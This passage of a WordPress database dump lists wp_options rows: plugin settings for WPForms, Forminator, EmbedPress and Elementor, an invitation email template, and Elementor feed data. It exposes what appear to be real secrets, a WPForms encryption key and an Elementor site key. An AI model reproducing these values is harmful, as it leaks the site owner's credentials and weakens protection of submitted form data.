sans-serif;&quot;&gt;\r\n&lt;div style=&quot;width: 600px; margin: 0 auto;&quot;&gt;\r\n&lt;div class=&quot;header&quot; style=&quot;border-bottom: 1px solid #ddd; padding: 20px 0; text-align: center;&quot;&gt;&lt;img src=&quot;{site_logo_url}&quot; /&gt;&lt;/div&gt;\r\n&lt;div class=&quot;content&quot; style=&quot;padding: 10px 0 40px;&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;strong&gt;{user_name}&lt;/strong&gt; has invited you to answer a question&lt;/p&gt;\r\n\r\n&lt;table width=&quot;100%&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot;&gt;\r\n&lt;tbody&gt;\r\n&lt;tr&gt;\r\n&lt;td class=&quot;user_avatar&quot; valign=&quot;top&quot; width=&quot;80&quot;&gt;\r\n&lt;div style=&quot;width: 60px; height: 60px; background: #ddd; text-align: center; word-wrap: break-word; margin-right: 20px;&quot;&gt;{user_avatar}&lt;/div&gt;&lt;/td&gt;\r\n&lt;td valign=&quot;top&quot;&gt;\r\n&lt;p style=&quot;font-size: 14px; line-height: 20px; color: #333; font-family: Arial, sans-serif;&quot;&gt;&lt;a style=&quot;text-decoration: none; color: #51b3ff; font-size: 15px;&quot; href=&quot;{question_}&quot;&gt;{question_title}&lt;/a&gt;\r\n{question_content}&lt;/p&gt;\r\n\r\n&lt;div style=&quot;padding: 10px 0 0;&quot;&gt;&lt;a class=&quot;btn&quot; style=&quot;color: #fff; border-radius: 3px; text-decoration: none; background-color: #51b3ff; padding: 10px 20px; font-size: 14px; font-family: Arial, sans-serif;&quot; href=&quot;{question_url}&quot;&gt;View Question&lt;/a&gt;&lt;/div&gt;&lt;/td&gt;\r\n&lt;/tr&gt;\r\n&lt;/tbody&gt;\r\n&lt;/table&gt;\r\n&lt;/div&gt;\r\n&lt;div class=&quot;footer&quot; style=&quot;border-top: 1px solid #ddd; padding: 20px 0; clear: both; text-align: center;&quot;&gt;&lt;small style=&quot;font-size: 11px;&quot;&gt;{site_name} - {site_description}&lt;/small&gt;&lt;/div&gt;\r\n&lt;/div&gt;\r\n&lt;/div&gt;\";}}','auto'),
(1001,'question_answer_settings','a:4:{s:14:\"archive_notice\";s:0:\"\";s:16:\"dashboard_notice\";s:0:\"\";s:26:\"question_submission_notice\";s:0:\"\";s:22:\"single_question_notice\";s:0:\"\";}','auto'),
(1185,'action_scheduler_hybrid_store_demarkation','474','auto'),
(1186,'schema-ActionScheduler_StoreSchema','7.0.1722571350','auto'),
(1187,'schema-ActionScheduler_LoggerSchema','3.0.1722571350','auto'),
(1188,'wpforms_version','1.9.5.2','auto'),
(1189,'wpforms_version_lite','1.9.5.2','auto'),
(1190,'wpforms_activated','a:1:{s:4:\"lite\";i:1722571350;}','auto'),
(1195,'action_scheduler_lock_async-request-runner','68d3a7c503ffe5.75650253|1758701569','no'),
(1196,'wpforms_versions_lite','a:15:{s:5:\"1.5.9\";i:0;s:7:\"1.6.7.2\";i:0;s:5:\"1.6.8\";i:0;s:5:\"1.7.5\";i:0;s:7:\"1.7.5.1\";i:0;s:5:\"1.7.7\";i:0;s:5:\"1.8.2\";i:0;s:5:\"1.8.3\";i:0;s:5:\"1.8.4\";i:0;s:5:\"1.8.6\";i:0;s:5:\"1.8.7\";i:0;s:7:\"1.8.9.6\";i:1722571351;s:5:\"1.9.1\";i:1747212290;s:5:\"1.9.2\";i:1747212301;s:7:\"1.9.5.2\";i:1747212290;}','auto'),
(1197,'widget_wpforms-widget','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),
(1200,'wpforms_settings','a:3:{s:13:\"modern-markup\";s:1:\"1\";s:20:\"modern-markup-is-set\";b:1;s:26:\"modern-markup-hide-setting\";b:1;}','auto'),
(1202,'wpforms_admin_notices','a:1:{s:14:\"review_request\";a:2:{s:4:\"time\";i:1722571353;s:9:\"dismissed\";b:0;}}','auto'),
(1203,'_wpforms_transient_timeout_addons.json','1748409079','off'),
(1204,'_wpforms_transient_addons.json','1747804279','off'),
(1205,'_wpforms_transient_timeout_docs.json','1748409090','off'),
(1206,'_wpforms_transient_docs.json','1747804290','off'),
(1207,'_wpforms_transient_timeout_templates.json','1748409091','off'),
(1208,'_wpforms_transient_templates.json','1747804291','off'),
(1209,'wpforms_builder_opened_date','1722571405','off'),
(1210,'wpforms_challenge','a:13:{s:6:\"status\";s:9:\"completed\";s:4:\"step\";i:4;s:7:\"user_id\";i:1;s:7:\"form_id\";i:474;s:10:\"embed_page\";i:0;s:16:\"embed_page_title\";s:0:\"\";s:16:\"started_date_gmt\";s:19:\"2024-08-02 04:03:55\";s:17:\"finished_date_gmt\";s:19:\"2024-08-02 04:05:38\";s:13:\"seconds_spent\";i:103;s:12:\"seconds_left\";i:197;s:13:\"feedback_sent\";b:0;s:19:\"feedback_contact_me\";b:0;s:13:\"window_closed\";s:1:\"1\";}','auto'),
(1213,'wpforms_templates_hash','23dc59cd4b5e40c408a0e9cdc8a44ed1','auto'),
(1217,'wpforms_process_forms_locator_status','completed','auto'),
(1218,'wpforms_forms_first_created','1722571484','off'),
(1249,'wpforms_crypto_secret_key','Tef9gfVxBA7aTlp1J4jmsYLbNnHw5gfR4mebFF6m9Rg=','auto'),
(1949,'_wpforms_transient_wpforms_htaccess_file','a:3:{s:4:\"size\";i:737;s:5:\"mtime\";i:1745945071;s:5:\"ctime\";i:1745945071;}','on'),
(1950,'wpforms_email_summaries_fetch_info_blocks_last_run','1747762652','auto'),
(2692,'post_views_counter_settings_general','a:19:{s:16:\"post_types_count\";a:1:{i:0;s:4:\"page\";}s:16:\"taxonomies_count\";b:0;s:11:\"users_count\";b:0;s:11:\"other_count\";b:0;s:12:\"data_storage\";s:7:\"cookies\";s:11:\"amp_support\";b:0;s:12:\"counter_mode\";s:3:\"php\";s:19:\"time_between_counts\";a:2:{s:6:\"number\";i:24;s:4:\"type\";s:5:\"hours\";}s:12:\"reset_counts\";a:2:{s:6:\"number\";i:0;s:4:\"type\";s:4:\"days\";}s:12:\"object_cache\";b:0;s:14:\"flush_interval\";a:2:{s:6:\"number\";i:0;s:4:\"type\";s:7:\"minutes\";}s:7:\"exclude\";a:2:{s:6:\"groups\";a:0:{}s:5:\"roles\";a:0:{}}s:11:\"exclude_ips\";a:0:{}s:13:\"strict_counts\";b:0;s:8:\"cron_run\";b:0;s:11:\"cron_update\";b:0;s:14:\"update_version\";i:2;s:13:\"update_notice\";b:1;s:17:\"update_delay_date\";i:1724252376;}','off'),
(2693,'post_views_counter_settings_display','a:15:{s:5:\"label\";s:68:\"สถิติผู้เข้าชมเว็บไซต์ :\";s:14:\"display_period\";s:5:\"total\";s:18:\"taxonomies_display\";a:0:{}s:12:\"user_display\";b:0;s:18:\"post_types_display\";a:1:{i:0;s:4:\"page\";}s:18:\"page_types_display\";a:1:{i:0;s:4:\"home\";}s:16:\"restrict_display\";a:2:{s:6:\"groups\";a:0:{}s:5:\"roles\";a:0:{}}s:8:\"position\";s:6:\"manual\";s:17:\"post_views_column\";b:1;s:19:\"restrict_edit_views\";b:0;s:15:\"dynamic_loading\";b:0;s:10:\"use_format\";b:1;s:13:\"display_style\";a:2:{s:4:\"icon\";b:1;s:4:\"text\";b:1;}s:10:\"icon_class\";s:19:\"dashicons-chart-bar\";s:18:\"toolbar_statistics\";b:1;}','off'),
(2694,'post_views_counter_settings_other','a:4:{s:13:\"menu_position\";s:3:\"top\";s:15:\"import_meta_key\";s:5:\"views\";s:19:\"deactivation_delete\";b:0;s:7:\"license\";s:0:\"\";}','off'),
(2695,'post_views_counter_version','1.5.5','off'),
(2696,'widget_post_views_counter_list_widget','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),
(2697,'post_views_counter_activation_date','1723042776','auto'),
(5759,'_site_transient_timeout_g_url_details_response_f89b1e5ba5a0d4fecbb6b4b0e6a369d6','1724402235','off'),
(57939,'db_upgraded','','on'),
(57948,'wpforms_constant_contact_version','3','auto'),
(57949,'sgpopup_customPostType_categories','a:20:{s:5:\"param\";a:8:{s:8:\"not_rule\";s:11:\"Select rule\";s:10:\"everywhere\";s:10:\"Everywhere\";s:4:\"Post\";a:4:{s:8:\"post_all\";s:9:\"All posts\";s:13:\"post_selected\";s:14:\"Selected posts\";s:9:\"post_type\";s:9:\"Post type\";s:13:\"post_category\";s:13:\"Post category\";}s:4:\"Page\";a:4:{s:8:\"page_all\";s:9:\"All pages\";s:13:\"page_selected\";s:14:\"Selected pages\";s:9:\"page_type\";s:9:\"Page type\";s:13:\"page_template\";s:13:\"Page template\";}s:4:\"Tags\";a:2:{s:9:\"post_tags\";s:8:\"All tags\";s:13:\"post_tags_ids\";s:13:\"Selected tags\";}s:18:\"e-floating-buttons\";a:4:{s:22:\"e-floating-buttons_all\";s:23:\"All E-floating-buttonss\";s:26:\"e-floating-buttons_archive\";s:28:\"Archives E-floating-buttonss\";s:27:\"e-floating-buttons_selected\";s:26:\"Select E-floating-buttonss\";s:29:\"e-floating-buttons_categories\";s:36:\"Select E-floating-buttons categories\";}s:17:\"elementor_library\";a:4:{s:21:\"elementor_library_all\";s:22:\"All Elementor_librarys\";s:25:\"elementor_library_archive\";s:27:\"Archives Elementor_librarys\";s:26:\"elementor_library_selected\";s:25:\"Select Elementor_librarys\";s:28:\"elementor_library_categories\";s:35:\"Select Elementor_library categories\";}s:8:\"question\";a:4:{s:12:\"question_all\";s:13:\"All Questions\";s:16:\"question_archive\";s:18:\"Archives Questions\";s:17:\"question_selected\";s:16:\"Select Questions\";s:19:\"question_categories\";s:26:\"Select Question categories\";}}s:8:\"operator\";a:2:{s:2:\"==\";s:2:\"Is\";s:2:\"!=\";s:6:\"Is not\";}s:13:\"post_selected\";a:0:{}s:13:\"page_selected\";a:0:{}s:9:\"post_type\";a:3:{s:18:\"e-floating-buttons\";s:18:\"e-floating-buttons\";s:17:\"elementor_library\";s:17:\"elementor_library\";s:8:\"question\";s:8:\"question\";}s:13:\"post_category\";a:0:{}s:9:\"page_type\";a:5:{s:12:\"is_home_page\";s:9:\"Home Page\";s:7:\"is_home\";s:10:\"Posts Page\";s:9:\"is_search\";s:12:\"Search Pages\";s:6:\"is_404\";s:9:\"404 Pages\";s:10:\"is_archive\";s:12:\"Archive Page\";}s:13:\"page_template\";a:12:{s:8:\"page.php\";s:16:\"Default Template\";s:16:\"elementor_canvas\";s:16:\"Elementor Canvas\";s:23:\"elementor_header_footer\";s:20:\"Elementor Full Width\";s:15:\"elementor_theme\";s:5:\"Theme\";s:23:\"page-templates/form.php\";s:4:\"Form\";s:26:\"page-templates/landing.php\";s:12:\"Landing Page\";s:34:\"page-templates/leftbar-subpage.php\";s:23:\"Left Sidebar (Sub Page)\";s:26:\"page-templates/leftbar.php\";s:12:\"Left Sidebar\";s:31:\"page-templates/leftrightbar.php\";s:20:\"Left & Right Sidebar\";s:27:\"page-templates/rightbar.php\";s:13:\"Right Sidebar\";s:27:\"page-templates/salepage.php\";s:10:\"Sales Page\";s:23:\"page-templates/soon.php\";s:11:\"Coming Soon\";}s:13:\"post_tags_ids\";a:0:{}s:10:\"everywhere\";N;s:8:\"not_rule\";N;s:8:\"post_all\";N;s:8:\"page_all\";N;s:9:\"post_tags\";N;s:22:\"e-floating-buttons_all\";N;s:27:\"e-floating-buttons_selected\";s:0:\"\";s:29:\"e-floating-buttons_categories\";a:0:{}s:21:\"elementor_library_all\";N;s:26:\"elementor_library_selected\";s:0:\"\";s:28:\"elementor_library_categories\";a:0:{}}','auto'),
(57953,'generateblocks','a:1:{s:20:\"disable_google_fonts\";b:0;}','auto'),
(57954,'gb_use_v1_blocks','1','off'),
(57955,'wpforms_splash_version','1.8.6','auto'),
(57958,'wpforms_version_upgraded_from','1.9.5.2','auto'),
(57959,'wpforms_version_previous','1.9.5.2','auto'),
(57960,'_wpforms_transient_timeout_splash.json','1747817101','off'),
(57961,'_wpforms_transient_splash.json','1747212301','off'),
(57962,'wpforms_splash_data_version','1.9.5','auto'),
(57963,'wpforms_pointers','a:2:{s:10:\"engagement\";a:0:{}s:7:\"dismiss\";a:1:{i:0;s:19:\"admin_menu_payments\";}}','auto'),
(57978,'_transient_wp_styles_for_blocks','a:2:{s:4:\"hash\";s:32:\"56f0d8667387e74cf1bcde35b8c09742\";s:6:\"blocks\";a:5:{s:11:\"core/button\";s:0:\"\";s:14:\"core/site-logo\";s:0:\"\";s:18:\"core/post-template\";s:120:\":where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}\";s:12:\"core/columns\";s:102:\":where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}\";s:14:\"core/pullquote\";s:69:\":root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;}\";}}','on'),
(59980,'_wpforms_transient_upload_htaccess_file','a:3:{s:4:\"size\";i:737;s:5:\"mtime\";i:1747762652;s:5:\"ctime\";i:1747762652;}','on'),
(60086,'forminator_free_install_date','1747829738','off'),
(60087,'forminator_action_scheduler_db_updated','1','auto'),
(60088,'wpmudev_recommended_plugins_registered','a:1:{s:25:\"forminator/forminator.php\";a:1:{s:13:\"registered_at\";i:1747804539;}}','off'),
(60089,'forminator_default_report_entry','1','auto'),
(60090,'forminator_version','1.47.0','auto'),
(60091,'widget_forminator_widget','a:1:{s:12:\"_multiwidget\";i:1;}','auto'),
(60107,'as_has_wp_comment_logs','no','on'),
(60109,'forminator_appearance_presets','a:1:{s:7:\"default\";s:14:\"Default Preset\";}','auto'),
(60131,'forminator_form_privacy_settings','a:0:{}','auto'),
(60135,'forminator_posts_map','a:1:{i:1516;a:1:{i:0;i:1523;}}','auto'),
(71272,'_wpforms_transient_timeout_existing_tables','1751427902','off'),
(71273,'_wpforms_transient_existing_tables','a:1:{s:12:\"wp_wpforms_%\";a:4:{i:0;s:15:\"wp_wpforms_logs\";i:1;s:23:\"wp_wpforms_payment_meta\";i:2;s:19:\"wp_wpforms_payments\";i:3;s:21:\"wp_wpforms_tasks_meta\";}}','off'),
(73765,'forminator_submissions_form_type','forminator_forms','auto'),
(73766,'forminator_submissions_form_id','1416','auto'),
(73802,'forminator_poll_privacy_settings','a:0:{}','auto'),
(73998,'embedpress','a:7:{s:20:\"turn_off_rating_help\";i:1;s:19:\"enablePluginInAdmin\";i:1;s:19:\"enablePluginInFront\";i:1;s:22:\"enableEmbedResizeWidth\";i:1200;s:23:\"enableEmbedResizeHeight\";i:1200;s:25:\"pdf_custom_color_settings\";i:1;s:12:\"custom_color\";s:7:\"#333333\";}','auto'),
(73999,'embedpress:elements','a:2:{s:9:\"gutenberg\";a:14:{s:17:\"google-docs-block\";s:17:\"google-docs-block\";s:8:\"document\";s:8:\"document\";s:10:\"embedpress\";s:10:\"embedpress\";s:14:\"embedpress-pdf\";s:14:\"embedpress-pdf\";s:19:\"google-sheets-block\";s:19:\"google-sheets-block\";s:19:\"google-slides-block\";s:19:\"google-slides-block\";s:13:\"youtube-block\";s:13:\"youtube-block\";s:18:\"google-forms-block\";s:18:\"google-forms-block\";s:21:\"google-drawings-block\";s:21:\"google-drawings-block\";s:17:\"google-maps-block\";s:17:\"google-maps-block\";s:12:\"twitch-block\";s:12:\"twitch-block\";s:12:\"wistia-block\";s:12:\"wistia-block\";s:11:\"vimeo-block\";s:11:\"vimeo-block\";s:19:\"embedpress-calendar\";s:19:\"embedpress-calendar\";}s:9:\"elementor\";a:4:{s:19:\"embedpress-document\";s:19:\"embedpress-document\";s:10:\"embedpress\";s:10:\"embedpress\";s:14:\"embedpress-pdf\";s:14:\"embedpress-pdf\";s:19:\"embedpress-calendar\";s:19:\"embedpress-calendar\";}}','auto'),
(74000,'embedpress_elements_updated','1','auto'),
(74001,'embedpress_v_320_migration','1','auto'),
(74002,'embedpress_v_330_migration','1','auto'),
(74003,'embedpress_notices','a:6:{s:19:\"holiday_2024_notice\";a:4:{s:5:\"start\";i:1758546860;s:10:\"recurrence\";b:0;s:7:\"refresh\";s:5:\"4.4.1\";s:6:\"expire\";i:1736553599;}s:7:\"version\";s:5:\"1.1.0\";s:24:\"black_friday_2024_notice\";a:4:{s:5:\"start\";i:1758546863;s:10:\"recurrence\";b:0;s:7:\"refresh\";s:5:\"4.4.1\";s:6:\"expire\";i:1733443199;}s:21:\"helloween_2024_notice\";a:4:{s:5:\"start\";i:1758546867;s:10:\"recurrence\";b:0;s:7:\"refresh\";s:5:\"4.4.1\";s:6:\"expire\";i:1730678399;}s:5:\"optin\";a:3:{s:5:\"start\";i:1759410890;s:10:\"recurrence\";i:30;s:7:\"refresh\";s:5:\"4.4.1\";}s:6:\"review\";a:3:{s:5:\"start\";i:1759842895;s:10:\"recurrence\";i:30;s:7:\"refresh\";s:5:\"4.4.1\";}}','off'),
(74008,'epgc_selected_calendar_ids','a:0:{}','off'),
(74017,'gutenberg_source_data','[]','auto'),
(74047,'elementor_active_kit','1557','auto'),
(74048,'elementor_font_display','swap','auto'),
(74051,'elementor_landing_pages_activation','0','auto'),
(74052,'elementor_version','3.30.4','auto'),
(74053,'elementor_install_history','a:2:{s:6:\"3.29.2\";i:1751354142;s:6:\"3.30.4\";i:1753982058;}','auto'),
(74054,'elementor_events_db_version','1.0.0','off'),
(74056,'elementor_checklist','{\"last_opened_timestamp\":null,\"first_closed_checklist_in_editor\":true,\"is_popup_minimized\":false,\"steps\":{\"add_logo\":{\"is_marked_completed\":false,\"is_immutable_completed\":false},\"set_fonts_and_colors\":{\"is_marked_completed\":false,\"is_immutable_completed\":false},\"create_pages\":{\"is_marked_completed\":false,\"is_immutable_completed\":false},\"setup_header\":{\"is_marked_completed\":false,\"is_immutable_completed\":false},\"assign_homepage\":{\"is_marked_completed\":false,\"is_immutable_completed\":false}},\"should_open_in_editor\":false}','auto'),
(74057,'elementor_onboarded','1','auto'),
(74058,'_elementor_installed_time','1751354176','auto'),
(74059,'elementor_connect_site_key','8f87add230d6c853b9a0787a326a19bc','auto'),
(74060,'elementor_remote_info_library','a:3:{s:10:\"types_data\";a:4:{s:5:\"block\";a:2:{s:10:\"categories\";a:30:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:8:\"Benefits\";i:4;s:14:\"call to action\";i:5;s:7:\"clients\";i:6;s:7:\"contact\";i:7;s:4:\"Data\";i:8;s:10:\"ehp-footer\";i:9;s:10:\"ehp-header\";i:10;s:3:\"faq\";i:11;s:8:\"features\";i:12;s:6:\"footer\";i:13;s:7:\"Gallery\";i:14;s:6:\"header\";i:15;s:4:\"hero\";i:16;s:11:\"Link in Bio\";i:17;s:9:\"portfolio\";i:18;s:7:\"pricing\";i:19;s:15:\"product archive\";i:20;s:5:\"Quote\";i:21;s:15:\"Service Details\";i:22;s:8:\"services\";i:23;s:11:\"single page\";i:24;s:11:\"single post\";i:25;s:14:\"single product\";i:26;s:5:\"stats\";i:27;s:9:\"subscribe\";i:28;s:4:\"team\";i:29;s:12:\"testimonials\";}s:4:\"sets\";a:5:{i:0;s:11:\"Boxing Club\";i:1;s:19:\"Business Consultant\";i:2;s:16:\"Marketing Agency\";i:3;s:9:\"Wireframe\";i:4;s:15:\"Workshop Center\";}}s:5:\"popup\";a:1:{s:10:\"categories\";a:6:{i:0;s:10:\"bottom bar\";i:1;s:7:\"classic\";i:2;s:6:\"fly-in\";i:3;s:11:\"full screen\";i:4;s:9:\"hello bar\";i:5;s:8:\"slide-in\";}}s:2:\"lp\";a:1:{s:10:\"categories\";a:15:{i:0;s:8:\"Business\";i:1;s:16:\"Coming Soon Page\";i:2;s:9:\"eCommerce\";i:3;s:9:\"Education\";i:4;s:6:\"Events\";i:5;s:18:\"Health and Fitness\";i:6;s:3:\"NFT\";i:7;s:14:\"Online Service\";i:8;s:7:\"Product\";i:9;s:11:\"Real Estate\";i:10;s:18:\"Social Involvement\";i:11;s:14:\"Thank You Page\";i:12;s:6:\"Travel\";i:13;s:18:\"Under Construction\";i:14;s:9:\"Wireframe\";}}s:2:\"lb\";a:1:{s:10:\"categories\";a:2:{i:0;s:4:\"post\";i:1;s:7:\"product\";}}}s:10:\"categories\";a:30:{i:0;s:8:\"404 page\";i:1;s:5:\"about\";i:2;s:7:\"archive\";i:3;s:8:\"Benefits\";i:4;s:14:\"call to action\";i:5;s:7:\"clients\";i:6;s:7:\"contact\";i:7;s:4:\"Data\";i:8;s:10:\"ehp-footer\";i:9;s:10:\"ehp-header\";i:10;s:3:\"faq\";i:11;s:8:\"features\";i:12;s:6:\"footer\";i:13;s:7:\"Gallery\";i:14;s:6:\"header\";i:15;s:4:\"hero\";i:16;s:11:\"Link in Bio\";i:17;s:9:\"portfolio\";i:18;s:7:\"pricing\";i:19;s:15:\"product archive\";i:20;s:5:\"Quote\";i:21;s:15:\"Service Details\";i:22;s:8:\"services\";i:23;s:11:\"single page\";i:24;s:11:\"single post\";i:25;s:14:\"single product\";i:26;s:5:\"stats\";i:27;s:9:\"subscribe\";i:28;s:4:\"team\";i:29;s:12:\"testimonials\";}s:9:\"templates\";a:4:{i:0;a:20:{s:4:\"tmpl\";i:1254;s:2:\"id\";i:20472;s:5:\"title\";s:10:\"test ido f\";s:9:\"thumbnail\";s:153:\"https://library.stg.elementor.red/wp-content/uploads/2025/01/png-clipart-logo-harry-potter-literary-series-lord-voldemort-film-harry-potter-thumbnail.png\";s:12:\"tmpl_created\";i:1751356263;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.stg.elementor.red/blocks/test-ido-f/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:0;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:1;a:20:{s:4:\"tmpl\";i:1227;s:2:\"id\";i:19968;s:5:\"title\";s:12:\"Zeyad Test 1\";s:9:\"thumbnail\";s:83:\"https://library.stg.elementor.red/wp-content/uploads/2022/09/boxking_hero_img_2.jpg\";s:12:\"tmpl_created\";i:1670765723;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.stg.elementor.red/blocks/zeyad-test-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:20;}i:2;a:20:{s:4:\"tmpl\";i:1231;s:2:\"id\";i:19494;s:5:\"title\";s:5:\"test2\";s:9:\"thumbnail\";s:83:\"https://library.stg.elementor.red/wp-content/uploads/2022/09/boxking_hero_img_4.jpg\";s:12:\"tmpl_created\";i:1672308146;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.stg.elementor.red/blocks/test2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:2;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:20;}i:3;a:20:{s:4:\"tmpl\";i:1209;s:2:\"id\";i:9631;s:5:\"title\";s:38:\"Slide-in | Sale | Register | Subscribe\";s:9:\"thumbnail\";s:87:\"https://library.stg.elementor.red/wp-content/uploads/2019/01/Slide-in_Sale_small_01.png\";s:12:\"tmpl_created\";i:1660034300;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.stg.elementor.red/popups/slide-in-sale-01/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:142;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}}}','off'),
(74061,'elementor_remote_info_feed_data','a:3:{i:0;a:5:{s:5:\"title\";s:70:\"Introducing Elementor 3.31: New Editor V4 Variables, Filters, and More\";s:7:\"excerpt\";s:294:\"Elementor 3.31 is here, pushing Editor V4 forward with powerful design system enhancements and modern visual styling tools. From Variables and Filters to smarter editing workflows and semantic markup, this version makes it easier than ever to design beautiful, performant, and accessible sites.\";s:7:\"created\";i:1755094220;s:5:\"badge\";s:3:\"NEW\";s:3:\"url\";s:140:\"https://elementor.com/blog/elementor-331-v4-alpha-variables-filters/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:1;a:5:{s:5:\"title\";s:67:\"What Is an MCP? The AI Breakthrough Web Creators Shouldn’t Ignore\";s:7:\"excerpt\";s:143:\"Discover how Model Context Protocol (MCP) is shaping AI-tool interaction and redefining how pro web creators build, manage, and scale websites.\";s:7:\"created\";i:1754310811;s:5:\"badge\";s:0:\"\";s:3:\"url\";s:130:\"https://elementor.com/blog/mcp-explained-for-web-creators/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:2;a:5:{s:5:\"title\";s:100:\"Introducing Elementor 3.30: new Editor V4 capabilities, full Website Templates in the cloud, & more!\";s:7:\"excerpt\";s:361:\"Elementor 3.30 is here and it includes upgrades that accelerate your workflow, bring you a step closer to the full power of Editor V4, and help you deliver beautiful, accessible websites faster than ever. From advanced styling tools and smarter editing to full Website Templates in the cloud, this release enhances both the way you design and the way you scale.\";s:7:\"created\";i:1751974442;s:5:\"badge\";s:3:\"NEW\";s:3:\"url\";s:140:\"https://elementor.com/blog/elementor-330-v4-alpha-website-templates/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}}','off'),
(74064,'_elementor_notifications_data','a:2:{s:7:\"timeout\";i:1752664971;s:5:\"value\";s:15287:\"[{\"id\":\"send-cart-widget\",\"title\":\"Introducing: Cart Widget\",\"description\":\"Show customers exactly what they left behind\\u2014visually. The new Cart Widget adds product images to your emails for smarter, higher-converting cart recovery.\",\"topic\":\"Send: Email & SMS built for WooCommerce\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/cart-widget-send.png\",\"chipTags\":[\"New Feature\"],\"cta\":\"Explore Cart Widget\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/WN_CartW\",\"conditions\":[[{\"type\":\"plugin\",\"operator\":\"!=\",\"plugin\":\"send-app\\/send-app.php\"}]]},{\"id\":\"classes-3.30\",\"title\":\"Better class control\",\"description\":\"Get popovers with your class name, breakpoint, state and possible conflicts. Plus, the exact class names you define are now reflected in the code, making debugging and working with external tools easier!\",\"topic\":\"Editor V4 Alpha\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/classes-3.30.png\",\"chipTags\":[\"New Feature\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-3.39-v4-blog\\/\",\"readMoreText\":\"Learn More\"},{\"id\":\"cloud-websites-3.30\",\"title\":\"Full Website Templates in the cloud\",\"description\":\"Save and apply entire websites, including multiple pages, styles, site settings, media, and layout configurations - directly from the cloud.\",\"topic\":\"Elementor Pro 3.30\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/cloud-3.30.png\",\"chipPlan\":\"Pro\",\"chipTags\":[\"New Feature\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-3.39-v4-blog\\/\",\"readMoreText\":\"Learn More\",\"conditions\":[[{\"type\":\"plugin\",\"plugin\":\"elementor-pro\\/elementor-pro.php\"}]]},{\"id\":\"cloud-websites-3.30\",\"title\":\"Full Website Templates in the cloud\",\"description\":\"Save and apply entire websites, including multiple pages, styles, site settings, media, and layout configurations - directly from the cloud.\",\"topic\":\"Elementor Pro 3.30\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/cloud-3.30.png\",\"chipTags\":[\"New Feature\"],\"cta\":\"Upgrade now\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-3.30-cloud-websites\\/\"},{\"id\":\"tools-3.30\",\"title\":\"Essential Editor tools\",\"description\":\"V4 now includes a long list of essential V3 capabilities, re-engineered to fit the new framework - IDs, custom unit, anchor offset, display none, object fit, clear icons and more!\",\"topic\":\"Editor V4 Alpha\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/tools-3.30.png\",\"chipTags\":[\"New 